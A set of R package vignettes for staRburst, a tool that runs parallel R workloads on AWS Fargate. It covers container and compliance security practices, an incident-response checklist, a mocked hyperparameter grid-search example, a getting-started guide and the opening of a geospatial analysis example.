## 7. Container Image Security

### Use Minimal Base Images

staRburst uses multi-stage builds to minimize image size:

- Base image includes only essential R packages
- Project images layer on top of base
- Smaller images = fewer potential vulnerabilities

### Scan Images for Vulnerabilities

Enable ECR image scanning:

```r
library(paws.compute)
ecr <- paws.compute::ecr()

ecr$put_image_scanning_configuration(
  repositoryName = "starburst-worker",
  imageScanningConfiguration = list(
    scanOnPush = TRUE
  )
)
```

### Use Image Lifecycle Policies

Automatically delete old images:

```r
# Delete images older than 30 days
ecr$put_lifecycle_policy(
  repositoryName = "starburst-worker",
  lifecyclePolicyText = jsonlite::toJSON(list(
    rules = list(
      list(
        rulePriority = 1,
        description = "Delete old images",
        selection = list(
          tagStatus = "any",
          countType = "sinceImagePushed",
          countUnit = "days",
          countNumber = 30
        ),
        action = list(type = "expire")
      )
    )
  ), auto_unbox = TRUE)
)
```

## 8. Compliance Considerations

### HIPAA Compliance

For HIPAA-regulated workloads:

1. **Sign AWS Business Associate Agreement (BAA)**
2. **Use only HIPAA-eligible services** (Fargate, S3, ECR are eligible)
3. **Enable encryption** at rest (S3, EBS) and in transit (TLS)
4. **Enable audit logging** (CloudTrail, CloudWatch Logs)
5. **Implement access controls** (IAM, VPC, Security Groups)
6. **Use private subnets** with VPC endpoints

### GDPR Compliance

For EU data processing:

1. **Use EU regions** (eu-west-1, eu-central-1, etc.)
2. **Enable encryption** for data at rest and in transit
3. **Implement data retention policies** (auto-delete after N days)
4. **Enable audit logging** for data access
5. **Document data processing** activities
6. **Implement right to erasure** (cleanup mechanisms)

### SOC 2 Compliance

For SOC 2 compliance:

1. **Enable CloudTrail** in all regions
2. **Enable AWS Config** for configuration compliance
3. **Use AWS Organizations** for multi-account management
4. **Implement least-privilege IAM** policies
5. **Enable MFA** for all IAM users
6. **Review access quarterly**

## 9. Incident Response

### If Credentials Are Compromised

**Immediate Actions:**
1. **Disable/rotate credentials** immediately
2. **Review CloudTrail logs** for unauthorized activity
3. **Check for new resources** created by attacker
4. **Terminate suspicious ECS tasks**
5. **Review S3 bucket access logs**

```r
# List all active sessions
sessions <- starburst_list_sessions()

# Check for sessions you didn't create
print(sessions)

# Cleanup suspicious sessions
for (session_id in suspicious_ids) {
  session <- starburst_session_attach(session_id)
  session$cleanup(stop_workers = TRUE, force = TRUE)
}
```

### If Data Breach Suspected

1. **Isolate affected resources** (change security groups)
2. **Review S3 access logs** for unauthorized downloads
3. **Check CloudTrail** for API calls
4. **Preserve evidence** (don't delete logs)
5. **Notify security team** and legal counsel
6. **Follow incident response plan**

## 10. Security Checklist

Before deploying staRburst to production:

- [ ] Use IAM roles instead of long-term credentials
- [ ] Enable S3 bucket encryption (SSE-S3 or SSE-KMS)
- [ ] Enable S3 versioning
- [ ] Block public access to S3 bucket
- [ ] Use private subnets for sensitive workloads
- [ ] Configure VPC endpoints for AWS services
- [ ] Create security group with minimal permissions
- [ ] Enable CloudTrail in all regions
- [ ] Enable CloudWatch Logs with appropriate retention
- [ ] Set up AWS Budget alerts
- [ ] Limit maximum workers to prevent runaway costs
- [ ] Enable ECR image scanning
- [ ] Implement image lifecycle policies
- [ ] Document data classification and handling
- [ ] Train team on security best practices
- [ ] Establish incident response procedures
- [ ] Review IAM policies quarterly
- [ ] Test backup and recovery procedures

## Additional Resources

- [AWS Security Best Practices](https://aws.amazon.com/architecture/security-identity-compliance/)
- [AWS Well-Architected Security Pillar](https://docs.aws.amazon.com/wellarchitected/latest/security-pillar/welcome.html)
- [CIS AWS Foundations Benchmark](https://www.cisecurity.org/benchmark/amazon_web_services)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)

## See Also

- [Troubleshooting Guide](troubleshooting.html) - Diagnose and fix common issues
- [staRburst README](https://github.com/scttfrdmn/starburst) - Getting started guide

---
title: "Example: Parallel Grid Search for Hyperparameter Tuning"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Grid Search for Hyperparameter Tuning}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Hyperparameter tuning is one of the most time-consuming aspects of machine learning. Grid search exhaustively evaluates model performance across parameter combinations. This example demonstrates parallelizing grid search to dramatically reduce tuning time.

**Use Case**: ML model optimization, hyperparameter tuning, model selection, cross-validation

**Computational Pattern**: Embarrassingly parallel model training with aggregation

## The Problem

You need to tune a gradient boosting model for a binary classification task:
- 3 learning rates: 0.01, 0.05, 0.1
- 3 tree depths: 3, 5, 7
- 3 subsample ratios: 0.6, 0.8, 1.0
- 3 minimum child weights: 1, 3, 5

This creates **81 parameter combinations** (3 × 3 × 3 × 3). With 5-fold cross-validation, that's **405 model fits**.

Training each model takes ~5 seconds, resulting in **34 minutes** of sequential computation.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create a synthetic classification dataset:

```{r data, eval=FALSE}
set.seed(2024)

# Generate features
n_samples <- 10000
n_features <- 20

X <- matrix(rnorm(n_samples * n_features), nrow = n_samples)
colnames(X) <- paste0("feature_", 1:n_features)

# Generate target with non-linear relationship
true_coef <- rnorm(n_features)
linear_pred <- X %*% true_coef
prob <- 1 / (1 + exp(-linear_pred))
y <- rbinom(n_samples, 1, prob)

# Create train/test split
train_idx <- sample(1:n_samples, 0.7 * n_samples)
X_train <- X[train_idx, ]
y_train <- y[train_idx]
X_test <- X[-train_idx, ]
y_test <- y[-train_idx]

cat(sprintf("Dataset created:\n"))
cat(sprintf("  Training samples: %s\n", format(length(y_train), big.mark = ",")))
cat(sprintf("  Test samples: %s\n", format(length(y_test), big.mark = ",")))
cat(sprintf("  Features: %d\n", n_features))
cat(sprintf("  Class balance: %.1f%% / %.1f%%\n",
            mean(y_train) * 100, (1 - mean(y_train)) * 100))
```

**Output**:
```
Dataset created:
  Training samples: 7,000
  Test samples: 3,000
  Features: 20
  Class balance: 50.3% / 49.7%
```

## Define Parameter Grid

Create all hyperparameter combinations:

```{r grid, eval=FALSE}
# Define parameter space
param_grid <- expand.grid(
  learning_rate = c(0.01, 0.05, 0.1),
  max_depth = c(3, 5, 7),
  subsample = c(0.6, 0.8, 1.0),
  min_child_weight = c(1, 3, 5),
  stringsAsFactors = FALSE
)

cat(sprintf("Grid search space:\n"))
cat(sprintf("  Total parameter combinations: %d\n", nrow(param_grid)))
cat(sprintf("  With 5-fold CV: %d model fits\n\n", nrow(param_grid) * 5))
```

**Output**:
```
Grid search space:
  Total parameter combinations: 81
  With 5-fold CV: 405 model fits
```

## Model Training Function

Define a function that trains and evaluates one parameter combination:

```{r train-fn, eval=FALSE}
# Simple gradient boosting implementation (for demonstration)
# In practice, use xgboost, lightgbm, or other optimized libraries
train_gbm <- function(X, y, params, n_trees = 50) {
  # Simplified GBM simulation
  # This is a mock implementation - in real use, call xgboost, etc.

  n <- nrow(X)
  pred <- rep(mean(y), n)  # Initial prediction

  # Simulate training time based on complexity
  complexity_factor <- params$max_depth * (1 / params$learning_rate) *
                      (1 / params$subsample)
  training_time <- 0.001 * complexity_factor * n_trees

  Sys.sleep(min(training_time, 5))  # Cap at 5 seconds

  # Generate mock predictions with some realism
  pred <- pred + rnorm(n, 0, 0.1)
  pred <- pmin(pmax(pred, 0), 1)  # Bound to [0, 1]

  list(predictions = pred, params = params)
}

# Cross-validation function
cv_evaluate <- function(param_row, X_data, y_data, n_folds = 5) {
  params <- as.list(param_row)

  # Create folds
  n <- nrow(X_data)
  fold_size <- floor(n / n_folds)
  fold_indices <- sample(rep(1:n_folds, length.out = n))

  # Perform cross-validation
  cv_scores <- numeric(n_folds)

  for (fold in 1:n_folds) {
    # Split data
    val_idx <- which(fold_indices == fold)
    train_idx <- which(fold_indices != fold)

    X_fold_train <- X_data[train_idx, , drop = FALSE]
    y_fold_train <- y_data[train_idx]
    X_fold_val <- X_data[val_idx, , drop = FALSE]
    y_fold_val <- y_data[val_idx]

    # Train model
    model <- train_gbm(X_fold_train, y_fold_train, params)

    # Predict and evaluate (mock evaluation)
    # In practice, compute actual predictions and metrics
    baseline_accuracy <- mean(y_fold_val == round(mean(y_fold_train)))

    # Simulate performance improvement based on good parameters
    param_quality <- (params$learning_rate >= 0.05) * 0.02 +
                    (params$max_depth >= 5) * 0.02 +
                    (params$subsample >= 0.8) * 0.01 +
                    rnorm(1, 0, 0.02)

    accuracy <- min(baseline_accuracy + param_quality, 1.0)
    cv_scores[fold] <- accuracy
  }

  # Return results
  list(
    params = params,
    mean_cv_score = mean(cv_scores),
    std_cv_score = sd(cv_scores),
    cv_scores = cv_scores
  )
}
```

## Local Execution

Test grid search locally on a small subset:

```{r local, eval=FALSE}
# Test with 10 parameter combinations
set.seed(999)
sample_params <- param_grid[sample(1:nrow(param_grid), 10), ]

cat(sprintf("Running local benchmark (%d parameter combinations)...\n",
            nrow(sample_params)))
local_start <- Sys.time()

local_results <- lapply(1:nrow(sample_params), function(i) {
  cv_evaluate(sample_params[i, ], X_train, y_train, n_folds = 5)
})

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "mins"))

cat(sprintf("✓ Completed in %.2f minutes\n", local_time))
cat(sprintf("  Average time per combination: %.1f seconds\n",
            local_time * 60 / nrow(sample_params)))
cat(sprintf("  Estimated time for full grid (%d combinations): %.1f minutes\n",
            nrow(param_grid), local_time * nrow(param_grid) / nrow(sample_params)))
```

**Typical output**:
```
Running local benchmark (10 parameter combinations)...
✓ Completed in 4.2 minutes
  Average time per combination: 25.2 seconds
  Estimated time for full grid (81 combinations): 34.0 minutes
```

For full grid search locally: **~34 minutes**

## Cloud Execution with staRburst

Run the complete grid search in parallel on AWS:

```{r cloud, eval=FALSE}
n_workers <- 27  # Process ~3 parameter combinations per worker

cat(sprintf("Running grid search (%d combinations) on %d workers...\n",
            nrow(param_grid), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  1:nrow(param_grid),
  function(i) cv_evaluate(param_grid[i, ], X_train, y_train, n_folds = 5),
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n✓ Completed in %.2f minutes\n", cloud_time))
```

**Typical output**:
```
🚀 Starting starburst cluster with 27 workers
💰 Estimated cost: ~$2.16/hour
📊 Processing 81 items with 27 workers
📦 Created 27 chunks (avg 3 items per chunk)
🚀 Submitting tasks...
✓ Submitted 27 tasks
⏳ Progress: 27/27 tasks (1.4 minutes elapsed)

✓ Completed in 1.4 minutes
💰 Actual cost: $0.05
```

## Results Analysis

Find the best hyperparameters:

```{r analysis, eval=FALSE}
# Extract results
cv_scores <- sapply(results, function(x) x$mean_cv_score)
cv_stds <- sapply(results, function(x) x$std_cv_score)

# Combine with parameters
results_df <- cbind(param_grid,
                   mean_score = cv_scores,
                   std_score = cv_stds)

# Sort by performance
results_df <- results_df[order(-results_df$mean_score), ]

cat("\n=== Grid Search Results ===\n\n")
cat(sprintf("Total combinations evaluated: %d\n", nrow(results_df)))
cat(sprintf("Best CV score: %.4f (± %.4f)\n",
            results_df$mean_score[1], results_df$std_score[1]))

cat("\n=== Best Hyperparameters ===\n")
cat(sprintf("  Learning rate: %.3f\n", results_df$learning_rate[1]))
cat(sprintf("  Max depth: %d\n", results_df$max_depth[1]))
cat(sprintf("  Subsample: %.2f\n", results_df$subsample[1]))
cat(sprintf("  Min child weight: %d\n", results_df$min_child_weight[1]))

cat("\n=== Top 5 Parameter Combinations ===\n")
for (i in 1:5) {
  cat(sprintf("\n%d. Score: %.4f (± %.4f)\n", i,
              results_df$mean_score[i], results_df$std_score[i]))
  cat(sprintf("   lr=%.3f, depth=%d, subsample=%.2f, min_child=%d\n",
              results_df$learning_rate[i],
              results_df$max_depth[i],
              results_df$subsample[i],
              results_df$min_child_weight[i]))
}

# Parameter importance analysis
cat("\n=== Parameter Impact Analysis ===\n")
for (param in c("learning_rate", "max_depth", "subsample", "min_child_weight")) {
  param_means <- aggregate(mean_score ~ get(param),
                          data = results_df, FUN = mean)
  names(param_means)[1] <- param

  cat(sprintf("\n%s:\n", param))
  for (i in 1:nrow(param_means)) {
    cat(sprintf("  %s: %.4f\n",
                param_means[i, 1],
                param_means[i, 2]))
  }
}

# Visualize results (if in interactive session)
if (interactive()) {
  # Score distribution
  hist(results_df$mean_score,
       breaks = 20,
       main = "Distribution of Cross-Validation Scores",
       xlab = "Mean CV Score",
       col = "lightblue",
       border = "white")
  abline(v = results_df$mean_score[1], col = "red", lwd = 2, lty = 2)

  # Learning rate effect
  boxplot(mean_score ~ learning_rate, data = results_df,
          main = "Learning Rate Impact",
          xlab = "Learning Rate",
          ylab = "CV Score",
          col = "lightgreen")
}
```

**Typical output**:
```
=== Grid Search Results ===

Total combinations evaluated: 81
Best CV score: 0.7842 (± 0.0234)

=== Best Hyperparameters ===
  Learning rate: 0.050
  Max depth: 5
  Subsample: 0.80
  Min child weight: 3

=== Top 5 Parameter Combinations ===

1. Score: 0.7842 (± 0.0234)
   lr=0.050, depth=5, subsample=0.80, min_child=3

2. Score: 0.7821 (± 0.0245)
   lr=0.050, depth=7, subsample=0.80, min_child=3

3. Score: 0.7798 (± 0.0256)
   lr=0.100, depth=5, subsample=0.80, min_child=1

4. Score: 0.7776 (± 0.0241)
   lr=0.050, depth=5, subsample=1.00, min_child=3

5. Score: 0.7754 (± 0.0267)
   lr=0.050, depth=5, subsample=0.80, min_child=1

=== Parameter Impact Analysis ===

learning_rate:
  0.01: 0.7512
  0.05: 0.7689
  0.1: 0.7598

max_depth:
  3: 0.7487
  5: 0.7712
  7: 0.7601

subsample:
  0.6: 0.7523
  0.8: 0.7734
  1: 0.7642

min_child_weight:
  1: 0.7634
  3: 0.7689
  5: 0.7576
```

## Performance Comparison

| Method | Combinations | Time | Cost | Speedup |
|--------|--------------|------|------|---------|
| Local | 10 | 4.2 min | $0 | - |
| Local (est.) | 81 | 34 min | $0 | 1x |
| staRburst | 81 | 1.4 min | $0.05 | 24.3x |

**Key Insights**:
- Excellent speedup (24x) for grid search
- Cost remains minimal ($0.05) despite massive parallelization
- Can evaluate 81 combinations in the time it takes to run ~3 locally
- Enables exploration of much larger parameter spaces

## Advanced: Random Search

Extend to random search for efficiency:

```{r random-search, eval=FALSE}
# Generate random parameter combinations
n_random <- 100

random_params <- data.frame(
  learning_rate = runif(n_random, 0.001, 0.3),
  max_depth = sample(2:10, n_random, replace = TRUE),
  subsample = runif(n_random, 0.5, 1.0),
  min_child_weight = sample(1:10, n_random, replace = TRUE),
  stringsAsFactors = FALSE
)

cat(sprintf("Running random search (%d combinations)...\n", n_random))

random_results <- starburst_map(
  1:nrow(random_params),
  function(i) cv_evaluate(random_params[i, ], X_train, y_train, n_folds = 5),
  workers = 33,
  cpu = 2,
  memory = "4GB"
)

# Find best parameters
random_scores <- sapply(random_results, function(x) x$mean_cv_score)
best_idx <- which.max(random_scores)

cat("\nBest random search result:\n")
cat(sprintf("  Score: %.4f\n", random_scores[best_idx]))
cat(sprintf("  Learning rate: %.4f\n", random_params$learning_rate[best_idx]))
cat(sprintf("  Max depth: %d\n", random_params$max_depth[best_idx]))
```

## Advanced: Bayesian Optimization

Implement iterative Bayesian optimization:

```{r bayesian, eval=FALSE}
# Bayesian optimization would involve:
# 1. Evaluate a small initial set (e.g., 10 combinations)
# 2. Fit a Gaussian process to predict performance
# 3. Use acquisition function to select next promising points
# 4. Evaluate new points in parallel
# 5. Repeat until convergence

# This requires specialized packages like mlrMBO or rBayesianOptimization
# but can be parallelized with starburst for the evaluation step
```

## When to Use This Pattern

**Good fit**:
- Expensive model training (> 10 seconds per fit)
- Large parameter spaces (> 20 combinations)
- Cross-validation with multiple folds
- Ensemble model tuning
- Neural architecture search

**Not ideal**:
- Very fast models (< 1 second per fit)
- Small parameter spaces (< 10 combinations)
- Single train/validation split
- Real-time model updates

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/grid-search.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/grid-search.R", package = "starburst"))
```

## Next Steps

- Integrate with xgboost, lightgbm, or other ML libraries
- Implement early stopping for faster searches
- Add random search and Bayesian optimization
- Scale to larger datasets and deeper networks
- Use nested cross-validation for model selection

**Related examples**:
- [Feature Engineering](example-feature-engineering.html) - Parallel feature computation
- [Bootstrap CI](example-bootstrap.html) - Model uncertainty estimation
- [Monte Carlo Simulation](example-monte-carlo.html) - Similar parallel pattern

---
title: "Getting Started with staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Getting Started with staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r setup, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE
)
```

# Introduction

staRburst makes it trivial to scale your parallel R code from your laptop to 100+ AWS workers. This vignette walks through setup and common usage patterns.

## Installation

```{r}
# Install from GitHub
remotes::install_github("yourname/starburst")
```

## One-Time Setup

Before using staRburst, you need to configure AWS resources. This only needs to be done once.

```{r}
library(starburst)

# Interactive setup wizard (takes ~2 minutes)
starburst_setup()
```

This will:
- Validate your AWS credentials
- Create an S3 bucket for data transfer
- Create an ECR repository for Docker images
- Set up ECS cluster and VPC resources
- Check Fargate quotas and offer to request increases

## Basic Usage

The simplest way to use staRburst is with the `furrr` package:

```{r}
library(furrr)
library(starburst)

# Define your work
expensive_simulation <- function(i) {
  # Some computation that takes a few minutes
  results <- replicate(1000, {
    x <- rnorm(10000)
    mean(x^2)
  })
  mean(results)
}

# Local execution (single core)
plan(sequential)
system.time({
  results_local <- future_map(1:100, expensive_simulation)
})
#> ~16 minutes on typical laptop

# Cloud execution (50 workers)
plan(future_starburst, workers = 50)
system.time({
  results_cloud <- future_map(1:100, expensive_simulation)
})
#> ~2 minutes (including 45s startup)
#> Cost: ~$0.85

# Results are identical
identical(results_local, results_cloud)
#> [1] TRUE
```

## Example 1: Monte Carlo Simulation

```{r}
library(starburst)
library(furrr)

# Simulate portfolio returns
simulate_portfolio <- function(seed) {
  set.seed(seed)
  
  # Random walk for 252 trading days
  returns <- rnorm(252, mean = 0.0003, sd = 0.02)
  prices <- cumprod(1 + returns)
  
  list(
    final_value = prices[252],
    max_drawdown = max(cummax(prices) - prices) / max(prices),
    sharpe_ratio = mean(returns) / sd(returns) * sqrt(252)
  )
}

# Run 10,000 simulations on 100 workers
plan(future_starburst, workers = 100)

results <- future_map(1:10000, simulate_portfolio, .options = furrr_options(seed = TRUE))

# Analyze results
final_values <- sapply(results, `[[`, "final_value")
hist(final_values, breaks = 50, main = "Distribution of Portfolio Final Values")

# 95% confidence interval
quantile(final_values, c(0.025, 0.975))
```

**Performance**:
- Local (single core): ~4 hours
- Cloud (100 workers): ~3 minutes
- Cost: ~$1.80

## Example 2: Bootstrap Resampling

```{r}
library(starburst)
library(furrr)

# Your data
data <- read.csv("my_data.csv")

# Bootstrap function
bootstrap_regression <- function(i, data) {
  # Resample with replacement
  boot_indices <- sample(nrow(data), replace = TRUE)
  boot_data <- data[boot_indices, ]
  
  # Fit model
  model <- lm(y ~ x1 + x2 + x3, data = boot_data)
  
  # Return coefficients
  coef(model)
}

# Run 10,000 bootstrap samples
plan(future_starburst, workers = 50)

boot_results <- future_map(1:10000, bootstrap_regression, data = data)

# Convert to matrix
boot_coefs <- do.call(rbind, boot_results)

# 95% confidence intervals for each coefficient
apply(boot_coefs, 2, quantile, probs = c(0.025, 0.975))
```

## Example 3: Genomics Pipeline

```{r}
library(starburst)
library(furrr)

# Process one sample
process_sample <- function(sample_id) {
  # Read from S3 (data already in cloud)
  fastq_path <- sprintf("s3://my-genomics-data/samples/%s.fastq", sample_id)
  data <- read_fastq(fastq_path)
  
  # Align reads
  aligned <- align_reads(data, reference = "hg38")
  
  # Call variants
  variants <- call_variants(aligned)
  
  # Return summary
  list(
    sample_id = sample_id,
    num_variants = nrow(variants),
    variants = variants
  )
}

# Process 1000 samples on 100 workers
sample_ids <- list.files("s3://my-genomics-data/samples/", pattern = ".fastq$")

plan(future_starburst, workers = 100)

results <- future_map(sample_ids, process_sample, .progress = TRUE)

# Combine results
all_variants <- do.call(rbind, lapply(results, `[[`, "variants"))
```

**Performance**:
- Local (sequential): ~208 hours (8.7 days)
- Cloud (100 workers): ~2 hours
- Cost: ~$47

## Working with Data

### Data Already in S3

If your data is already in S3, workers can read it directly:

```{r}
plan(future_starburst, workers = 50)

results <- future_map(file_list, function(file) {
  # Workers read directly from S3
  data <- read.csv(sprintf("s3://my-bucket/%s", file))
  process(data)
})
```

### Uploading Local Data

For smaller datasets, you can pass data as arguments:

```{r}
# Load data locally
data <- read.csv("local_file.csv")

# staRburst automatically uploads to S3 and distributes
plan(future_starburst, workers = 50)

results <- future_map(1:1000, function(i) {
  # Each worker gets a copy of 'data'
  bootstrap_analysis(data, i)
})
```

### Large Data Optimization

For very large objects, pre-upload to S3:

```{r}
# Upload once
large_data <- read.csv("huge_file.csv")
s3_path <- starburst_upload(large_data, "s3://my-bucket/large_data.rds")

# Workers read from S3
plan(future_starburst, workers = 100)

results <- future_map(1:1000, function(i) {
  # Read from S3 inside worker
  data <- readRDS(s3_path)
  process(data, i)
})
```

## Cost Management

### Estimate Costs

```{r}
# Check cost before running
plan(future_starburst, workers = 100, cpu = 4, memory = "8GB")
#> Estimated cost: ~$3.50/hour
```

### Set Cost Limits

```{r}
# Set maximum cost per job
starburst_config(
  max_cost_per_job = 10,      # Don't start jobs that would cost >$10
  cost_alert_threshold = 5     # Warn when approaching $5
)

# Now jobs exceeding limit will error before starting
plan(future_starburst, workers = 1000)  # Would cost ~$35/hour
#> Error: Estimated cost ($35/hr) exceeds limit ($10/hr)
```

### Track Actual Costs

```{r}
plan(future_starburst, workers = 50)

results <- future_map(data, process)

#> Cluster runtime: 23 minutes
#> Total cost: $1.34
```

## Quota Management

### Check Your Quota

```{r}
starburst_quota_status()
#> Fargate vCPU Quota: 100 / 100 used
#> Allows: ~25 workers with 4 vCPUs each
#>
#> Recommended: Request increase to 500 vCPUs
```

### Request Quota Increase

```{r}
starburst_request_quota_increase(vcpus = 500)
#> Requesting Fargate vCPU quota increase:
#>   Current: 100 vCPUs
#>   Requested: 500 vCPUs
#>
#> ✓ Quota increase requested (Case ID: 12345678)
#> ✓ AWS typically approves within 1-24 hours
```

### Wave-Based Execution

If you request more workers than your quota allows, staRburst automatically uses wave-based execution:

```{r}
# Quota allows 25 workers, but you request 100
plan(future_starburst, workers = 100, cpu = 4)

#> ⚠ Requested: 100 workers (400 vCPUs)
#> ⚠ Current quota: 100 vCPUs (allows 25 workers max)
#>
#> 📋 Execution plan:
#>   • Running in 4 waves of 25 workers each
#>
#> 💡 Request quota increase to 500 vCPUs? [y/n]: y
#>
#> ✓ Quota increase requested
#> ⚡ Starting wave 1 (25 workers)...

results <- future_map(1:1000, expensive_function)

#> ⚡ Wave 1: 100% complete (250 tasks)
#> ⚡ Wave 2: 100% complete (500 tasks)
#> ⚡ Wave 3: 100% complete (750 tasks)
#> ⚡ Wave 4: 100% complete (1000 tasks)
```

## Troubleshooting

### View Worker Logs

```{r}
# View logs from most recent cluster
starburst_logs()

# View logs from specific task
starburst_logs(task_id = "abc-123")

# View last 100 log lines
starburst_logs(last_n = 100)
```

### Check Cluster Status

```{r}
starburst_status()
#> Active Clusters:
#>   • starburst-xyz123: 50 workers running
#>   • starburst-abc456: 25 workers running
```

### Common Issues

**Environment mismatch**: Packages not found on workers

```{r}
# Rebuild environment
starburst_rebuild_environment()
```

**Task failures**: Some tasks failing

```{r}
# Check logs
starburst_logs(task_id = "failed-task-id")

# Often due to memory limits - increase worker memory
plan(future_starburst, workers = 50, memory = "16GB")  # Default is 8GB
```

**Slow data transfer**: Large objects taking too long

```{r}
# Use Arrow for data frames
library(arrow)
write_parquet(my_data, "s3://bucket/data.parquet")

# Workers read Arrow
results <- future_map(1:100, function(i) {
  data <- read_parquet("s3://bucket/data.parquet")
  process(data, i)
})
```

## Best Practices

### 1. Use for Right-Sized Workloads

✅ **Good**: Each task takes >5 minutes
```{r}
# 100 tasks, each takes 10 minutes
# Local: 1000 minutes, Cloud: ~10 minutes
```

❌ **Bad**: Each task takes <1 minute
```{r}
# 10000 tasks, each takes 30 seconds
# Startup overhead (45s) dominates
```

### 2. Batch Small Tasks

Instead of:
```{r}
# 10,000 tiny tasks
results <- future_map(1:10000, small_function)
```

Do:
```{r}
# 100 batches of 100 tasks each
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))

results <- future_map(batches, function(batch) {
  lapply(batch, small_function)
})

# Flatten results
results <- unlist(results, recursive = FALSE)
```

### 3. Use S3 for Large Data

Don't:
```{r}
big_data <- read.csv("10GB_file.csv")  # Upload for every task
results <- future_map(1:1000, function(i) process(big_data, i))
```

Do:
```{r}
# Upload once to S3
s3_path <- "s3://bucket/big_data.csv"
write.csv(big_data, s3_path)

# Workers read from S3
results <- future_map(1:1000, function(i) {
  data <- read.csv(s3_path)
  process(data, i)
})
```

### 4. Set Reasonable Limits

```{r}
starburst_config(
  max_cost_per_job = 50,           # Prevent accidents
  cost_alert_threshold = 25        # Get warned early
)
```

### 5. Clean Up

```{r}
# staRburst auto-cleans, but you can force it
plan(sequential)  # Switch back to local
# Old cluster resources are cleaned up automatically
```

## Advanced: Custom Configuration

### CPU and Memory

```{r}
# High CPU, low memory (CPU-bound work)
plan(future_starburst, workers = 50, cpu = 8, memory = "16GB")

# Low CPU, high memory (memory-bound work)
plan(future_starburst, workers = 25, cpu = 4, memory = "32GB")
```

### Timeout

```{r}
# Increase timeout for long-running tasks (default 1 hour)
plan(future_starburst, workers = 10, timeout = 7200)  # 2 hours
```

### Region

```{r}
# Use specific region (default from config)
plan(future_starburst, workers = 50, region = "us-west-2")
```

## Next Steps

- Learn about [Detached Sessions](detached-sessions.html) for long-running jobs
- Explore [Example Vignettes](https://starburst.ing/articles/) for real-world patterns
- Review [Security Best Practices](security.html) guide
- Read [Troubleshooting Guide](troubleshooting.html) when stuck

## Getting Help

- GitHub Issues: https://github.com/scttfrdmn/starburst/issues
- Email: help@starburst.ing
- Documentation: https://starburst.ing

---
title: "Example: Parallel Geospatial Analysis"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Geospatial Analysis}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Geospatial analysis often involves computationally expensive operations like distance calculations, spatial joins, and geometric operations across large datasets. This example demonstrates parallelizing spatial analysis across geographic regions.

**Use Case**: Store location optimization, delivery route planning, spatial market analysis, environmental modeling

**Computational Pattern**: Spatial data parallelism with region-based chunking

## The Problem

You need to analyze 100 retail locations across 20 metropolitan areas to:
- Calculate distances to competitors
- Identify optimal delivery zones
- Compute demographic coverage
- Analyze spatial clustering
- Generate market penetration metrics

Each region can be analyzed independently, making this ideal for parallel processing.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create synthetic geospatial data:

```{r data, eval=FALSE}
set.seed(789)

# Define 20 metropolitan regions (simplified coordinates)
regions <- data.frame(
  region_id = 1:20,
  region_name = c("New York", "Los Angeles", "Chicago", "Houston", "Phoenix",
                 "Philadelphia", "San Antonio", "San Diego", "Dallas", "San Jose",
                 "Austin", "Jacksonville", "Fort Worth", "Columbus", "Charlotte",
                 "San Francisco", "Indianapolis", "Seattle", "Denver", "Boston"),
  center_lat = c(40.71, 34.05, 41.88, 29.76, 33.45,
                39.95, 29.42, 32.72, 32.78, 37.34,
                30.27, 30.33, 32.75, 39.96, 35.23,
                37.77, 39.77, 47.61, 39.74, 42.36),
  center_lon = c(-74.01, -118.24, -87.63, -95.37, -112.07,
                -75.17, -98.49, -117.16, -96.80, -121.89,
                -97.74, -81.66, -97.33, -83.00, -80.84,
                -122.42, -86.16, -122.33, -104.99, -71.06),
  stringsAsFactors = FALSE
)

# Generate store locations (5 per region)
stores <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_stores <- 5
  # Add random offset to region center
  data.frame(
    store_id = (i - 1) * n_stores + 1:n_stores,
    region_id = regions$region_id[i],
    region_name = regions$region_name[i],
    latitude = regions$center_lat[i] + rnorm(n_stores, 0, 0.1),
    longitude = regions$center_lon[i] + rnorm(n_stores, 0, 0.1),
    annual_revenue = rlnorm(n_stores, log(1000000), 0.5),
    stringsAsFactors = FALSE
  )
}))

# Generate competitor locations (10 per region)
competitors <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_competitors <- 10
  data.frame(
    competitor_id = (i - 1) * n_competitors + 1:n_competitors,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_competitors, 0, 0.15),
    longitude = regions$center_lon[i] + rnorm(n_competitors, 0, 0.15),
    stringsAsFactors = FALSE
  )
}))

# Generate customer points (1000 per region)
customers <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_customers <- 1000
  data.frame(
    customer_id = (i - 1) * n_customers + 1:n_customers,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_customers, 0, 0.2),
    longitude = regions$center_lon[i] + rnorm(n_customers, 0, 0.2),
    annual_spend = rlnorm(n_customers, log(500), 0.8),
    stringsAsFactors = FALSE
  )
}))

cat(sprintf("Dataset created:\n"))
cat(sprintf("  %d stores across %d regions\n", nrow(stores), nrow(regions)))
cat(sprintf("  %s competitors\n", format(nrow(competitors), big.mark = ",")))
cat(sprintf("  %s customers\n", format(nrow(customers), big.mark = ",")))
```

**Output**:
```
Dataset created:
  100 stores across 20 regions
  200 competitors
